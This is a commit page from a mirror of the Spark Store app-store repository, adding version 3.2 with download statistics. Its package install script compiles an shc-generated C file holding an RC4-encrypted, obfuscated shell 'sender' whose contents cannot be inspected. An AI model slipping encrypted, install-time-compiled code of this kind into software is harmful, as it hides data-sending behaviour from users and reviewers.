spark-store-project/spark-store
14
0
Fork 0
mirror of https://gitee.com/spark-store-project/spark-store synced 2025-07-05 21:25:59 +08:00
Code Issues1 Packages Projects Releases Wiki Activity

3.2

Browse Source 
混淆过的.c文件
This commit is contained in:
shenmo 2022-08-29 15:44:22 +08:00
parent 1331c369ad
commit 807777e3dc
6 changed files with 833 additions and 4 deletions

6
debian/changelog vendored

@ -1,3 +1,9 @@
spark-store (3.2) stable; urgency=medium
* 新增下载量统计功能
-- shenmo <shenmo@spark-app.store> Fri, 30 Jan 2022 00:00:00 +0800
spark-store (3.1.6) stable; urgency=medium
* 修复部分情况下无法选中正确的镜像源的问题

3
debian/control vendored

@ -36,7 +36,8 @@ Depends:${shlibs:Depends}, ${misc:Depends},
curl,
dde-qt5integration,
bubblewrap,
aria2
aria2,
gcc
Description: Spark Store
A community powered app store, based on DTK.
Recommends: apt-fast

4
debian/spark-store.postinst vendored

@ -19,9 +19,11 @@ case "$1" in
ln -s -f /opt/durapps/spark-store/bin/spark-dstore-patch /usr/local/bin/spark-dstore-patch
ln -s -f /opt/durapps/spark-store/bin/aptss /usr/local/bin/ss-apt-fast
ln -s -f /opt/durapps/spark-store/bin/aptss /usr/bin/aptss
ln -s -f /opt/durapps/spark-store/bin/aptss /usr/bin/aptss
# Compile the Sender module
gcc /opt/durapps/spark-store/bin/ss-feedback/sender-d.sh.c -o /opt/durapps/spark-store/bin/ss-feedback/sender-d
# Download and install key
mkdir -p /tmp/spark-store-install/

3
debian/spark-store.prerm vendored

@ -11,6 +11,9 @@ rm /usr/bin/aptss
rm -rf /etc/aptss/
# Remove Sender module
rm /opt/durapps/spark-store/bin/ss-feedback/sender-d
# Remove residual symbol links to stop upgrade detect if exist
if [ -e /etc/xdg/autostart/spark-update-notifier.desktop ];then
rm /etc/xdg/autostart/spark-update-notifier.desktop

4
src/main.cpp

@ -30,7 +30,7 @@ int main(int argc, char *argv[])
DAboutDialog dialog;
a.setAboutDialog(&dialog);
dialog.setLicense(QObject::tr("We publish this program under GPL V3"));
dialog.setVersion(DApplication::buildVersion("Version 3.1.6"));
dialog.setVersion(DApplication::buildVersion("Version 3.2"));
dialog.setProductIcon(QIcon::fromTheme("spark-store")); // 设置Logo
dialog.setProductName(QLabel::tr("Spark Store"));
dialog.setDescription(
@ -51,7 +51,7 @@ int main(int argc, char *argv[])
a.setOrganizationName("spark-union");
a.setOrganizationDomain("https://www.deepinos.org/");
a.setApplicationName("Spark Store"); //不需要翻译,否则 ~/.local/share/ 下文件夹名称也被翻译为中文
a.setApplicationVersion(DApplication::buildVersion("3.1.6"));
a.setApplicationVersion(DApplication::buildVersion("3.2"));
a.setApplicationAcknowledgementPage("https://gitee.com/deepin-community-store/spark-store");
a.setApplicationDescription(
QObject::tr(

817
tool/ss-feedback/sender-d.sh.c Normal file

@ -0,0 +1,817 @@
#if 0
shc Version 4.0.3, Generic Shell Script Compiler
GNU GPL Version 3 Md Jahidul Hamid <jahidulhamid@yahoo.com>
shc -v -r -f sender-d.sh
#endif
static char data [] =
#define pswd_z 256
#define pswd ((&data[15]))
"\073\237\114\151\003\324\064\061\057\100\342\310\062\343\346\075"
"\105\011\036\257\154\107\223\050\237\060\137\020\063\015\377\156"
"\162\230\321\117\026\333\267\322\335\062\077\075\261\355\172\366"
"\367\231\246\144\341\071\215\201\151\354\221\234\371\221\013\153"
"\052\334\273\101\267\162\023\224\244\123\322\125\100\115\114\067"
"\347\362\233\310\053\050\111\225\025\333\061\016\154\075\172\227"
"\031\065\330\320\250\354\145\114\077\067\242\200\204\357\267\154"
"\341\123\064\015\174\176\242\221\131\324\240\306\021\032\136\053"
"\117\066\373\367\043\141\104\142\230\347\342\035\326\232\212\270"
"\356\276\306\152\075\151\374\227\076\234\135\120\266\273\173\006"
"\362\167\376\025\330\103\170\161\052\133\217\001\366\031\272\344"
"\330\201\116\025\352\113\254\051\347\012\171\236\305\365\245\270"
"\154\243\316\105\346\106\267\021\242\106\023\230\137\316\174\067"
"\117\313\115\072\026\371\143\376\003\334\234\311\322\101\202\076"
"\345\120\204\313\227\073\335\071\202\360\321\341\276\116\031\016"
"\031\146\110\057\140\253\056\144\210\312\056\132\014\260\231\361"
"\000\036\275\230\131\232\321\333\213\243\275\112\361\327\130\360"
"\173\100\213\115\034\027\361\331\141\342\261\272\356\360\133\051"
"\217\247\222\222\173\307\304\253\007\247\163\072\212\132\052\005"
"\232\266\123\266\315\104\220"
#define date_z 1
#define date ((&data[311]))
"\375"
#define tst2_z 19
#define tst2 ((&data[312]))
"\031\242\273\246\041\336\076\145\246\300\036\051\047\366\106\356"
"\220\064\226"
#define shll_z 10
#define shll ((&data[331]))
"\142\312\022\213\061\052\357\062\161\266\353\321"
#define inlo_z 3
#define inlo ((&data[343]))
"\216\314\250"
#define msg1_z 65
#define msg1 ((&data[347]))
"\300\115\164\240\306\270\356\211\346\362\207\042\205\377\337\231"
"\113\016\267\021\330\324\374\242\242\336\361\041\143\054\223\355"
"\361\326\220\125\016\336\260\031\012\341\025\102\124\131\005\244"
"\234\133\315\262\013\375\340\025\227\352\060\034\236\222\347\136"
"\160\356\206\333\112\340\006\120\173\274\243\061"
#define chk1_z 22
#define chk1 ((&data[427]))
"\270\017\004\242\044\277\223\036\316\135\273\047\172\354\056\123"
"\141\200\041\375\363\101\127\122\242\373\336\067\346\143\370"
#define text_z 1869
#define text ((&data[549]))
"\071\315\146\114\156\047\322\111\162\262\117\303\055\014\146\137"
"\226\117\042\116\136\046\360\203\135\327\346\126\251\033\243\342"
"\351\012\056\127\062\000\240\244\263\360\147\341\374\316\101\222"
"\035\143\341\174\212\322\377\350\251\345\076\122\001\342\065\352"
"\355\143\101\037\144\342\304\030\323\053\372\320\372\073\142\030"
"\237\104\224\051\026\223\022\300\171\121\023\172\064\110\144\041"
"\131\377\367\164\123\316\261\141\353\367\301\016\274\016\120\047"
"\114\046\100\031\034\140\073\010\260\305\236\267\340\334\172\305"
"\021\246\221\332\021\311\021\154\112\347\316\242\317\135\332\301"
"\336\151\126\072\217\354\230\133\220\107\301\140\001\353\360\166"
"\213\363\372\027\233\047\323\276\201\201\216\023\154\320\161\313"
"\320\152\257\025\322\272\025\153\247\235\321\160\071\321\067\253"
"\241\156\046\022\220\271\031\066\331\215\206\354\323\250\277\275"
"\253\021\137\373\037\247\054\101\371\345\374\104\113\056\231\313"
"\256\361\253\230\051\271\176\340\337\333\050\341\362\056\167\255"
"\110\043\213\146\047\300\122\142\314\236\021\040\074\377\243\374"
"\373\242\311\017\027\025\325\213\232\031\105\104\013\052\212\072"
"\030\104\271\142\045\220\026\110\122\375\151\376\117\030\367\246"
"\217\256\245\325\077\346\276\327\045\113\166\374\164\175\046\022"
"\327\265\135\221\047\346\332\276\260\240\227\230\211\165\023\170"
"\316\154\240\317\001\217\073\173\212\106\115\070\141\315\324\116"
"\204\026\326\026\254\252\257\044\333\310\024\223\327\026\336\312"
"\151\363\273\204\220\242\016\226\317\314\156\124\240\122\232\124"
"\110\055\240\223\016\373\000\136\102\135\122\057\222\070\210\130"
"\012\234\324\361\047\201\232\126\155\021\270\134\303\377\110\250"
"\220\352\314\011\276\260\131\175\233\367\254\266\366\263\014\102"
"\237\066\305\270\257\117\034\316\147\136\133\373\051\333\006\077"
"\242\225\073\276\155\106\311\232\247\112\341\143\016\103\013\062"
"\214\247\315\302\241\024\076\037\135\126\145\227\342\323\061\230"
"\016\246\203\251\033\223\105\251\131\001\060\306\305\034\005\133"
"\161\366\173\132\343\314\135\205\273\260\170\145\370\262\153\321"
"\253\345\131\260\346\020\367\016\127\056\307\040\112\052\012\264"
"\247\057\273\157\016\275\270\226\173\033\071\042\072\142\170\134"
"\045\016\163\251\362\073\214\166\354\103\017\330\122\073\211\204"
"\200\004\003\176\324\343\275\017\056\341\055\071\173\175\144\147"
"\365\115\274\012\253\277\036\370\220\115\307\120\131\037\206\063"
"\355\032\324\265\064\114\014\217\113\302\125\301\033\100\357\042"
"\334\212\202\353\262\040\130\240\027\110\343\271\356\171\001\325"
"\167\062\056\061\210\316\075\142\261\005\116\142\230\367\343\135"
"\174\302\375\047\075\334\222\326\253\073\174\173\360\260\021\344"
"\331\315\146\233\057\007\314\231\256\113\221\021\126\173\045\315"
"\247\126\162\253\375\041\043\263\232\274\171\132\320\020\070\152"
"\013\224\371\045\350\270\077\251\145\063\357\171\036\245\125\315"
"\020\206\333\111\062\331\054\144\346\173\132\113\374\043\022\371"
"\311\101\043\300\337\334\367\145\030\023\207\043\253\042\227\302"
"\350\037\067\332\350\253\117\124\243\341\046\211\061\007\303\154"
"\022\210\064\112\311\170\123\071\332\266\205\151\265\300\343\237"
"\147\001\024\013\173\265\330\375\070\111\044\246\204\155\146\067"
"\036\060\065\251\005\354\200\115\136\076\034\040\335\033\043\221"
"\374\211\170\061\251\321\372\116\023\167\330\007\310\060\175\076"
"\064\242\253\131\116\074\275\022\133\016\203\214\254\115\002\325"
"\046\213\073\107\241\341\273\110\300\236\005\231\275\325\012\175"
"\365\056\370\275\132\330\041\035\166\130\240\013\162\041\163\140"
"\377\225\075\315\115\106\270\277\233\113\106\305\270\240\026\106"
"\317\325\264\324\126\337\214\155\366\331\372\200\306\272\163\333"
"\266\343\246\100\016\002\242\070\231\262\005\137\323\257\343\047"
"\301\206\266\341\302\046\266\167\227\276\125\165\027\044\353\035"
"\043\036\300\137\140\244\156\205\364\361\067\016\324\110\142\167"
"\125\216\360\003\023\161\060\263\356\073\050\173\151\371\005\027"
"\027\273\363\163\017\044\064\055\267\345\052\320\370\132\374\123"
"\020\263\163\176\037\145\346\003\275\377\154\040\166\363\224\240"
"\214\304\332\367\057\146\070\165\101\026\125\361\100\357\001\031"
"\305\363\242\164\125\067\077\063\134\271\250\242\243\022\031\114"
"\225\006\352\203\137\376\201\147\225\372\053\217\331\003\156\143"
"\332\361\315\167\027\232\307\331\314\071\025\271\047\031\126\310"
"\254\200\324\257\022\351\244\007\335\036\150\036\362\072\021\007"
"\140\155\073\242\063\071\162\205\121\257\302\056\155\071\306\057"
"\236\364\027\143\074\375\254\324\117\176\242\267\247\215\374\137"
"\003\123\113\247\064\347\123\321\123\044\211\351\253\045\226\324"
"\034\147\117\066\000\370\074\041\242\137\270\361\106\154\113\045"
"\275\172\101\331\157\137\222\202\136\241\075\132\267\033\325\113"
"\042\352\305\133\274\252\111\213\330\215\261\145\322\246\174\031"
"\267\347\275\247\251\030\255\106\116\362\117\277\024\135\356\172"
"\033\066\346\252\205\144\302\147\131\076\122\021\152\225\313\235"
"\202\066\043\300\027\147\263\001\201\341\121\051\310\140\317\333"
"\131\254\112\104\337\014\320\143\375\231\252\220\064\143\234\000"
"\017\304\317\113\131\055\324\177\367\224\230\264\132\311\261\152"
"\034\137\223\225\365\314\014\076\377\025\023\040\222\043\022\047"
"\332\363\144\102\015\314\010\256\206\065\310\103\337\001\326\206"
"\024\354\074\045\337\107\003\225\137\032\055\332\056\347\073\055"
"\267\115\315\204\061\310\304\007\065\267\107\176\066\216\011\014"
"\066\215\236\247\176\327\164\113\353\215\343\313\302\106\302\250"
"\077\220\165\207\015\144\336\311\065\351\311\163\104\104\267\262"
"\307\057\106\061\110\271\053\136\133\263\066\177\103\212\234\166"
"\271\130\043\076\352\006\066\017\220\207\275\024\235\356\377\344"
"\005\257\200\002\253\123\052\015\326\342\225\116\137\256\213\354"
"\251\026\237\347\166\014\121\075\306\022\247\276\265\017\375\161"
"\174\113\273\017\227\064\057\217\376\326\311\140\354\074\160\121"
"\346\370\327\255\277\376\062\301\033\111\042\016\233\162\101\303"
"\161\123\210\042\157\270\114\252\372\315\352\335\221\115\300\252"
"\163\344\140\324\157\261\256\232\173\171\024\250\006\342\320\340"
"\365\137\167\336\216\320\337\345\265\346\363\133\023\076\121\117"
"\002\021\237\112\206\043\012\370\033\045\133\151\303\330\001\222"
"\073\174\074\320\054\005\127\000\210\240\347\131\256\126\253\007"
"\342\137\135\162\075\344\340\210\333\057\141\042\223\055\006\174"
"\000\005\225\117\203\320\143\136\130\037\333\217\136\371\221\220"
"\052\071\173\374\261\213\235\241\071\260\057\226\360\212\211\346"
"\333\062\135\157\357\316\156\022\111\201\010\151\065\111\364\364"
"\137\005\161\265\354\014\003\204\117\112\075\042\357\165\042\354"
"\263\304\343\323\045\127\244\326\160\216\335\042\353\173\135\061"
"\354\306\013\252\265\013\046\173\100\050\146\372\303\210\171\200"
"\160\377\013\300\245\265\307\146\355\047\052\007\011\214\060\367"
"\177\327\043\302\111\263\123\276\107\220\316\207\024\142\070\325"
"\004\262\276\355\075\175\146\163\370\345\135\214\322\041\105\047"
"\371\073\016\023\064\231\203\005\246\204\203\306\340\002\160\365"
"\315\022\302\170\340\356\151\323\344\242\134\046\134\162\227\117"
"\262\240\062\234\324\135\326\242\341\066\232\314\200\331\124\077"
"\201\245\227\252\073\356\252\367\277\232\331\005\324\350\032\261"
"\035\246\325\177\334\121\146\316\041\043\352\253\373\043\035\234"
"\231\321\046\171\221\105\216\272\025\321\042\222\007\351\363\232"
"\006\016\231\137\124\215\132\071\166\042\065\127\337\253\307\021"
"\337\364\070\261\112\201\310\242\335\104\353\055\277\322\232\240"
"\007\374\034\322\312\373\031\130\204\036\362\373\142\043\273\315"
"\216\373\273\260\310\111\070\031\207\101\325\157\110\142\216\357"
"\172\023\345\067\105\007\375\023\053\256\121\163\255\323\257\132"
"\164\360\307\234\106\130\275\217\211\327\300\322\261\206\364\326"
"\021\255\077\302\202\027\207\370\263\313\333\070\010\115\377\271"
"\173\302\243\224\126\201\255\356\261\176\213\135\216\054\237\371"
"\040\174\342\367\323\053\341\031\333\211\214\042\343\254\122\252"
"\325\326\263\326\325\063\065\362\114\161\314\151\116\237\160\073"
"\321\025\336\117\020\055\371\021\371\104\001\072\204\064\227\333"
"\034\374\123\265\343\026\372\207\264\033\065\316\147\211\142\366"
"\371\257\120\162\107\234\134\010\035\212\241\132\317\254\246\101"
"\020\211\005\051\134\061\043\054\054\137\217\104\376\323\330\050"
"\352\154\072\253\345\214\276\137\300\006\304\341\262\152\043\303"
"\364\051\354\120\132\017\175\207\156\014\313\155\337\244\225\312"
"\020\320\165\366\134\063\126\034\072\032\376\355\205\041\260\171"
"\113\234\312\245\254\107\055\033\123\370\210\063\235\036\375\256"
"\356\163\245\113\247\373\150\341\025\146\316\233\210\177\024\323"
"\034\336\171\310\046\246\343\171\237\153\255\075\211\252\353\170"
"\036\220\304\305\214\054\246\242\222\165\075\033\365\122\357\021"
"\061\150\331\127\017\275\321\257\051\176"
#define chk2_z 19
#define chk2 ((&data[2562]))
"\330\053\107\261\150\156\021\060\277\165\015\167\176\171\251\302"
"\276\160\207\325\012\334"
#define lsto_z 1
#define lsto ((&data[2581]))
"\010"
#define xecc_z 15
#define xecc ((&data[2582]))
"\005\040\327\254\114\361\156\300\024\244\110\337\050\143\126\227"
"\257"
#define tst1_z 22
#define tst1 ((&data[2603]))
"\036\047\271\057\207\076\001\326\201\264\356\151\036\164\071\111"
"\027\304\031\244\017\252\223\354\153\051\130\042\011\260"
#define msg2_z 19
#define msg2 ((&data[2632]))
"\341\357\377\335\143\002\251\076\361\005\267\075\204\313\320\034"
"\012\023\243\361\261\374\315\242"
#define rlax_z 1
#define rlax ((&data[2653]))
"\121"
#define opts_z 1
#define opts ((&data[2654]))
"\241"/* End of data[] */;
#define hide_z 4096
#define SETUID 0 /* Define as 1 to call setuid(0) at start of script */
#define DEBUGEXEC 0 /* Define as 1 to debug execvp calls */
#define TRACEABLE 1 /* Define as 1 to enable ptrace the executable */
#define HARDENING 0 /* Define as 1 to disable ptrace/dump the executable */
#define BUSYBOXON 0 /* Define as 1 to enable work with busybox */
#if HARDENING
static const char * shc_x[] = {
"/*",
" * Copyright 2019 - Intika <intika@librefox.org>",
" * Replace ******** with secret read from fd 21",
" * Also change arguments location of sub commands (sh script commands)",
" * gcc -Wall -fpic -shared -o shc_secret.so shc_secret.c -ldl",
" */",
"",
"#define _GNU_SOURCE /* needed to get RTLD_NEXT defined in dlfcn.h */",
"#define PLACEHOLDER \"********\"",
"#include <dlfcn.h>",
"#include <stdlib.h>",
"#include <string.h>",
"#include <unistd.h>",
"#include <stdio.h>",
"#include <signal.h>",
"",
"static char secret[128000]; //max size",
"typedef int (*pfi)(int, char **, char **);",
"static pfi real_main;",
"",
"// copy argv to new location",
"char **copyargs(int argc, char** argv){",
" char **newargv = malloc((argc+1)*sizeof(*argv));",
" char *from,*to;",
" int i,len;",
"",
" for(i = 0; i<argc; i++){",
" from = argv[i];",
" len = strlen(from)+1;",
" to = malloc(len);",
" memcpy(to,from,len);",
" // zap old argv space",
" memset(from,'\\0',len);",
" newargv[i] = to;",
" argv[i] = 0;",
" }",
" newargv[argc] = 0;",
" return newargv;",
"}",
"",
"static int mymain(int argc, char** argv, char** env) {",
" //fprintf(stderr, \"Inject main argc = %d\\n\", argc);",
" return real_main(argc, copyargs(argc,argv), env);",
"}",
"",
"int __libc_start_main(int (*main) (int, char**, char**),",
" int argc,",
" char **argv,",
" void (*init) (void),",
" void (*fini)(void),",
" void (*rtld_fini)(void),",
" void (*stack_end)){",
" static int (*real___libc_start_main)() = NULL;",
" int n;",
"",
" if (!real___libc_start_main) {",
" real___libc_start_main = dlsym(RTLD_NEXT, \"__libc_start_main\");",
" if (!real___libc_start_main) abort();",
" }",
"",
" n = read(21, secret, sizeof(secret));",
" if (n > 0) {",
" int i;",
"",
" if (secret[n - 1] == '\\n') secret[--n] = '\\0';",
" for (i = 1; i < argc; i++)",
" if (strcmp(argv[i], PLACEHOLDER) == 0)",
" argv[i] = secret;",
" }",
"",
" real_main = main;",
"",
" return real___libc_start_main(mymain, argc, argv, init, fini, rtld_fini, stack_end);",
"}",
"",
0};
#endif /* HARDENING */
/* rtc.c */
#include <sys/stat.h>
#include <sys/types.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
/* 'Alleged RC4' */
static unsigned char stte[256], indx, jndx, kndx;
/*
* Reset arc4 stte.
*/
void stte_0(void)
{
indx = jndx = kndx = 0;
do {
stte[indx] = indx;
} while (++indx);
}
/*
* Set key. Can be used more than once.
*/
void key(void * str, int len)
{
unsigned char tmp, * ptr = (unsigned char *)str;
while (len > 0) {
do {
tmp = stte[indx];
kndx += tmp;
kndx += ptr[(int)indx % len];
stte[indx] = stte[kndx];
stte[kndx] = tmp;
} while (++indx);
ptr += 256;
len -= 256;
}
}
/*
* Crypt data.
*/
void arc4(void * str, int len)
{
unsigned char tmp, * ptr = (unsigned char *)str;
while (len > 0) {
indx++;
tmp = stte[indx];
jndx += tmp;
stte[indx] = stte[jndx];
stte[jndx] = tmp;
tmp += stte[indx];
*ptr ^= stte[tmp];
ptr++;
len--;
}
}
/* End of ARC4 */
#if HARDENING
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <signal.h>
#include <sys/prctl.h>
#define PR_SET_PTRACER 0x59616d61
/* Seccomp Sandboxing Init */
#include <stdlib.h>
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <linux/audit.h>
#define ArchField offsetof(struct seccomp_data, arch)
#define Allow(syscall) \
BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, SYS_##syscall, 0, 1), \
BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)
struct sock_filter filter[] = {
/* validate arch */
BPF_STMT(BPF_LD+BPF_W+BPF_ABS, ArchField),
BPF_JUMP( BPF_JMP+BPF_JEQ+BPF_K, AUDIT_ARCH_X86_64, 1, 0),
BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
/* load syscall */
BPF_STMT(BPF_LD+BPF_W+BPF_ABS, offsetof(struct seccomp_data, nr)),
/* list of allowed syscalls */
Allow(exit_group), /* exits a process */
Allow(brk), /* for malloc(), inside libc */
Allow(mmap), /* also for malloc() */
Allow(munmap), /* for free(), inside libc */
/* and if we don't match above, die */
BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
};
struct sock_fprog filterprog = {
.len = sizeof(filter)/sizeof(filter[0]),
.filter = filter
};
/* Seccomp Sandboxing - Set up the restricted environment */
void seccomp_hardening() {
if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
perror("Could not start seccomp:");
exit(1);
}
if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &filterprog) == -1) {
perror("Could not start seccomp:");
exit(1);
}
}
/* End Seccomp Sandboxing Init */
void shc_x_file() {
FILE *fp;
int line = 0;
if ((fp = fopen("/tmp/shc_x.c", "w")) == NULL ) {exit(1); exit(1);}
for (line = 0; shc_x[line]; line++) fprintf(fp, "%s\n", shc_x[line]);
fflush(fp);fclose(fp);
}
int make() {
char * cc, * cflags, * ldflags;
char cmd[4096];
cc = getenv("CC");
if (!cc) cc = "cc";
sprintf(cmd, "%s %s -o %s %s", cc, "-Wall -fpic -shared", "/tmp/shc_x.so", "/tmp/shc_x.c -ldl");
if (system(cmd)) {remove("/tmp/shc_x.c"); return -1;}
remove("/tmp/shc_x.c"); return 0;
}
void arc4_hardrun(void * str, int len) {
//Decode locally
char tmp2[len];
char tmp3[len+1024];
memcpy(tmp2, str, len);
unsigned char tmp, * ptr = (unsigned char *)tmp2;
int lentmp = len;
int pid, status;
pid = fork();
shc_x_file();
if (make()) {exit(1);}
setenv("LD_PRELOAD","/tmp/shc_x.so",1);
if(pid==0) {
//Start tracing to protect from dump & trace
if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
kill(getpid(), SIGKILL);
_exit(1);
}
//Decode Bash
while (len > 0) {
indx++;
tmp = stte[indx];
jndx += tmp;
stte[indx] = stte[jndx];
stte[jndx] = tmp;
tmp += stte[indx];
*ptr ^= stte[tmp];
ptr++;
len--;
}
//Do the magic
sprintf(tmp3, "%s %s", "'********' 21<<<", tmp2);
//Exec bash script //fork execl with 'sh -c'
system(tmp2);
//Empty script variable
memcpy(tmp2, str, lentmp);
//Clean temp
remove("/tmp/shc_x.so");
//Sinal to detach ptrace
ptrace(PTRACE_DETACH, 0, 0, 0);
exit(0);
}
else {wait(&status);}
/* Seccomp Sandboxing - Start */
seccomp_hardening();
exit(0);
}
#endif /* HARDENING */
/*
* Key with file invariants.
*/
int key_with_file(char * file)
{
struct stat statf[1];
struct stat control[1];
if (stat(file, statf) < 0)
return -1;
/* Turn on stable fields */
memset(control, 0, sizeof(control));
control->st_ino = statf->st_ino;
control->st_dev = statf->st_dev;
control->st_rdev = statf->st_rdev;
control->st_uid = statf->st_uid;
control->st_gid = statf->st_gid;
control->st_size = statf->st_size;
control->st_mtime = statf->st_mtime;
control->st_ctime = statf->st_ctime;
key(control, sizeof(control));
return 0;
}
#if DEBUGEXEC
void debugexec(char * sh11, int argc, char ** argv)
{
int i;
fprintf(stderr, "shll=%s\n", sh11 ? sh11 : "<null>");
fprintf(stderr, "argc=%d\n", argc);
if (!argv) {
fprintf(stderr, "argv=<null>\n");
} else {
for (i = 0; i <= argc ; i++)
fprintf(stderr, "argv[%d]=%.60s\n", i, argv[i] ? argv[i] : "<null>");
}
}
#endif /* DEBUGEXEC */
void rmarg(char ** argv, char * arg)
{
for (; argv && *argv && *argv != arg; argv++);
for (; argv && *argv; argv++)
*argv = argv[1];
}
void chkenv_end(void);
int chkenv(int argc)
{
char buff[512];
unsigned long mask, m;
int l, a, c;
char * string;
extern char ** environ;
mask = (unsigned long)getpid();
stte_0();
key(&chkenv, (void*)&chkenv_end - (void*)&chkenv);
key(&data, sizeof(data));
key(&mask, sizeof(mask));
arc4(&mask, sizeof(mask));
sprintf(buff, "x%lx", mask);
string = getenv(buff);
#if DEBUGEXEC
fprintf(stderr, "getenv(%s)=%s\n", buff, string ? string : "<null>");
#endif
l = strlen(buff);
if (!string) {
/* 1st */
sprintf(&buff[l], "=%lu %d", mask, argc);
putenv(strdup(buff));
return 0;
}
c = sscanf(string, "%lu %d%c", &m, &a, buff);
if (c == 2 && m == mask) {
/* 3rd */
rmarg(environ, &string[-l - 1]);
return 1 + (argc - a);
}
return -1;
}
void chkenv_end(void){}
#if HARDENING
static void gets_process_name(const pid_t pid, char * name) {
char procfile[BUFSIZ];
sprintf(procfile, "/proc/%d/cmdline", pid);
FILE* f = fopen(procfile, "r");
if (f) {
size_t size;
size = fread(name, sizeof (char), sizeof (procfile), f);
if (size > 0) {
if ('\n' == name[size - 1])
name[size - 1] = '\0';
}
fclose(f);
}
}
void hardening() {
prctl(PR_SET_DUMPABLE, 0);
prctl(PR_SET_PTRACER, -1);
int pid = getppid();
char name[256] = {0};
gets_process_name(pid, name);
if ( (strcmp(name, "bash") != 0)
&& (strcmp(name, "/bin/bash") != 0)
&& (strcmp(name, "sh") != 0)
&& (strcmp(name, "/bin/sh") != 0)
&& (strcmp(name, "sudo") != 0)
&& (strcmp(name, "/bin/sudo") != 0)
&& (strcmp(name, "/usr/bin/sudo") != 0)
&& (strcmp(name, "gksudo") != 0)
&& (strcmp(name, "/bin/gksudo") != 0)
&& (strcmp(name, "/usr/bin/gksudo") != 0)
&& (strcmp(name, "kdesu") != 0)
&& (strcmp(name, "/bin/kdesu") != 0)
&& (strcmp(name, "/usr/bin/kdesu") != 0)
)
{
printf("Operation not permitted\n");
kill(getpid(), SIGKILL);
exit(1);
}
}
#endif /* HARDENING */
#if !TRACEABLE
#define _LINUX_SOURCE_COMPAT
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>
#if !defined(PT_ATTACHEXC) /* New replacement for PT_ATTACH */
#if !defined(PTRACE_ATTACH) && defined(PT_ATTACH)
#define PT_ATTACHEXC PT_ATTACH
#elif defined(PTRACE_ATTACH)
#define PT_ATTACHEXC PTRACE_ATTACH
#endif
#endif
void untraceable(char * argv0)
{
char proc[80];
int pid, mine;
switch(pid = fork()) {
case 0:
pid = getppid();
/* For problematic SunOS ptrace */
#if defined(__FreeBSD__)
sprintf(proc, "/proc/%d/mem", (int)pid);
#else
sprintf(proc, "/proc/%d/as", (int)pid);
#endif
close(0);
mine = !open(proc, O_RDWR|O_EXCL);
if (!mine && errno != EBUSY)
mine = !ptrace(PT_ATTACHEXC, pid, 0, 0);
if (mine) {
kill(pid, SIGCONT);
} else {
perror(argv0);
kill(pid, SIGKILL);
}
_exit(mine);
case -1:
break;
default:
if (pid == waitpid(pid, 0, 0))
return;
}
perror(argv0);
_exit(1);
}
#endif /* !TRACEABLE */
char * xsh(int argc, char ** argv)
{
char * scrpt;
int ret, i, j;
char ** varg;
char * me = argv[0];
if (me == NULL) { me = getenv("_"); }
if (me == 0) { fprintf(stderr, "E: neither argv[0] nor $_ works."); exit(1); }
ret = chkenv(argc);
stte_0();
key(pswd, pswd_z);
arc4(msg1, msg1_z);
arc4(date, date_z);
if (date[0] && (atoll(date)<time(NULL)))
return msg1;
arc4(shll, shll_z);
arc4(inlo, inlo_z);
arc4(xecc, xecc_z);
arc4(lsto, lsto_z);
arc4(tst1, tst1_z);
key(tst1, tst1_z);
arc4(chk1, chk1_z);
if ((chk1_z != tst1_z) || memcmp(tst1, chk1, tst1_z))
return tst1;
arc4(msg2, msg2_z);
if (ret < 0)
return msg2;
varg = (char **)calloc(argc + 10, sizeof(char *));
if (!varg)
return 0;
if (ret) {
arc4(rlax, rlax_z);
if (!rlax[0] && key_with_file(shll))
return shll;
arc4(opts, opts_z);
#if HARDENING
arc4_hardrun(text, text_z);
exit(0);
/* Seccomp Sandboxing - Start */
seccomp_hardening();
#endif
arc4(text, text_z);
arc4(tst2, tst2_z);
key(tst2, tst2_z);
arc4(chk2, chk2_z);
if ((chk2_z != tst2_z) || memcmp(tst2, chk2, tst2_z))
return tst2;
/* Prepend hide_z spaces to script text to hide it. */
scrpt = malloc(hide_z + text_z);
if (!scrpt)
return 0;
memset(scrpt, (int) ' ', hide_z);
memcpy(&scrpt[hide_z], text, text_z);
} else { /* Reexecute */
if (*xecc) {
scrpt = malloc(512);
if (!scrpt)
return 0;
sprintf(scrpt, xecc, me);
} else {
scrpt = me;
}
}
j = 0;
#if BUSYBOXON
varg[j++] = "busybox";
varg[j++] = "sh";
#else
varg[j++] = argv[0]; /* My own name at execution */
#endif
if (ret && *opts)
varg[j++] = opts; /* Options on 1st line of code */
if (*inlo)
varg[j++] = inlo; /* Option introducing inline code */
varg[j++] = scrpt; /* The script itself */
if (*lsto)
varg[j++] = lsto; /* Option meaning last option */
i = (ret > 1) ? ret : 0; /* Args numbering correction */
while (i < argc)
varg[j++] = argv[i++]; /* Main run-time arguments */
varg[j] = 0; /* NULL terminated array */
#if DEBUGEXEC
debugexec(shll, j, varg);
#endif
execvp(shll, varg);
return shll;
}
int main(int argc, char ** argv)
{
#if SETUID
setuid(0);
#endif
#if DEBUGEXEC
debugexec("main", argc, argv);
#endif
#if HARDENING
hardening();
#endif
#if !TRACEABLE
untraceable(argv[0]);
#endif
argv[1] = xsh(argc, argv);
fprintf(stderr, "%s%s%s: %s\n", argv[0],
errno ? ": " : "",
errno ? strerror(errno) : "",
argv[1] ? argv[1] : "<null>"
);
return 1;
}